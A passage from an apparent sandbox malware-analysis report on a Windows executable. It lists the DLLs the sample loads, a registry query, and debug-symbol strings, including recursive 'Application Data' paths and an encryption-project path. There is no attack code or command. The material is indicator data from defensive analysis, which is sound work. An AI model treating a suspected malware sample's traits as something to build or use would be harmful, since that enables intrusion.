          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: msimg32.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: iertutil.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: dpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: urlmon.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: srvcli.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: netutils.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: 66d5df681876c_file010924.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\che\p source: 66d5df681876c_file010924.exe, 00000007.00000003.1874024202.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873342035.0000000003596000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862419723.000000000358D000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862505786.0000000003598000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874976893.00000000035C6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1926069584.000000000386F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873929708.0000000003857000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927184545.0000000003876000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1898829486.000000000383F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874849344.000000000385E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\Data\P source: 66d5df681876c_file010924.exe, 00000007.00000003.1449642704.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\e\\oC source: 66d5df681876c_file010924.exe, 00000007.00000003.1419014721.00000000006AD000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1419063280.00000000006B3000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\*8Ym9W source: 66d5df681876c_file010924.exe, 00000007.00000003.1874172143.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1876173870.00000000034C4000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841010847.00000000034C1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1863595092.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1857497513.00000000034C3000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1896115774.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1897648882.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781668191.00000000034BD000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1940486710.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1896183215.00000000034C3000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1925928920.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840831198.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927479762.00000000034BC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1856785304.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862923885.00000000034AC000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\\* source: 66d5df681876c_file010924.exe, 00000007.00000003.1407550736.0000000003018000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\AC\D@y source: 66d5df681876c_file010924.exe, 00000007.00000003.1939452087.0000000003E58000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1923844523.0000000003DE8000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1939452087.0000000003DE8000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1503154342.0000000003586000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503857906.0000000002FED000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781457345.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781705167.0000000003596000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1646227393.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1449688125.000000000358E000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503665626.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1449273396.0000000003560000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781558146.0000000003578000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1644137786.000000000357F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1781606614.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841010847.00000000034C1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1644137786.000000000357F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840831198.00000000034A1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1841840045.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862345075.000000000392F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862065132.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841612895.00000000038B7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1855268527.00000000038AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\X- source: 66d5df681876c_file010924.exe, 00000007.00000003.1841566342.000000000355A000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1842024201.000000000355B000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840659359.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1842496402.0000000003581000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841761179.000000000355B000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840136245.0000000003515000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1842318558.000000000357F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1782551785.00000000034A1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1842736440.000000000383F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1921818522.0000000003CC7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1897447370.0000000003BC1000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1928412478.0000000003D38000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1896722726.0000000003C68000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1898391125.0000000003CB8000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1897980412.0000000003C87000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*^R source: 66d5df681876c_file010924.exe, 00000007.00000003.1644137786.000000000357F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1782075407.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841048090.0000000003630000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1782415161.0000000003614000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1782250781.00000000035DB000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781335365.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1782358386.0000000003608000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1646227393.0000000002FEC000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1782627575.000000000362C000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840928675.0000000003618000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1842632171.0000000003633000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840031953.00000000035DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 66d5df681876c_file010924.exe, 66d5df681876c_file010924.exe, 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Etx source: 66d5df681876c_file010924.exe, 00000007.00000003.1897447370.0000000003BC1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\.q source: 66d5df681876c_file010924.exe, 00000007.00000003.1644137786.000000000357F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\R\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1644137786.000000000357F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 66d5df681876c_file010924.exe, 00000007.00000003.1354753858.0000000003440000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: ntdesk\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1449434066.00000000034FF000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1449688125.000000000358E000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1449273396.0000000003560000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 66d5df681876c_file010924.exe, 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\06\n [<k source: 66d5df681876c_file010924.exe, 00000007.00000003.1863411961.0000000003005000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\9 source: 66d5df681876c_file010924.exe, 00000007.00000003.1939452087.0000000003E58000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\` source: 66d5df681876c_file010924.exe, 00000007.00000003.1856829390.0000000003638000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1875087794.0000000003640000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841048090.0000000003630000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873658789.00000000035CE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873342035.0000000003596000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873863860.00000000035DE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1856302765.00000000035E6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1856700609.0000000003618000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840928675.0000000003618000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1842632171.0000000003633000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874583286.000000000361A000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1840031953.00000000035DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1926069584.000000000386F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1926339843.0000000003AB6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927184545.0000000003876000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927721951.00000000038AF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1940441236.000000000389F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ate\d source: 66d5df681876c_file010924.exe, 00000007.00000003.1941224453.00000000035D6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1503426204.0000000003016000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1414687237.0000000003052000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1449970090.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503544842.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1414539784.0000000003039000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1414572819.000000000304A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1841678052.00000000037B1000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Uz source: 66d5df681876c_file010924.exe, 00000007.00000003.1895097511.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927368986.000000000392F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1925557469.00000000038E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ules\; source: 66d5df681876c_file010924.exe, 00000007.00000003.1450042666.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1449434066.00000000034FF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1781457345.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503598195.0000000003540000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1645701345.0000000003543000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1503233619.000000000350C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\o source: 66d5df681876c_file010924.exe, 00000007.00000003.1926069584.000000000386F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873929708.0000000003857000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927184545.0000000003876000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1898829486.000000000383F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874849344.000000000385E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\:\UML source: 66d5df681876c_file010924.exe, 00000007.00000003.1841840045.00000000038DF000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862345075.000000000392F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862065132.00000000038AE000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1841612895.00000000038B7000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1855268527.00000000038AE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\<9 source: 66d5df681876c_file010924.exe, 00000007.00000003.1863411961.0000000003005000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1940798434.00000000035F6000.00000004.00000020.00020000.00000000.sdmp
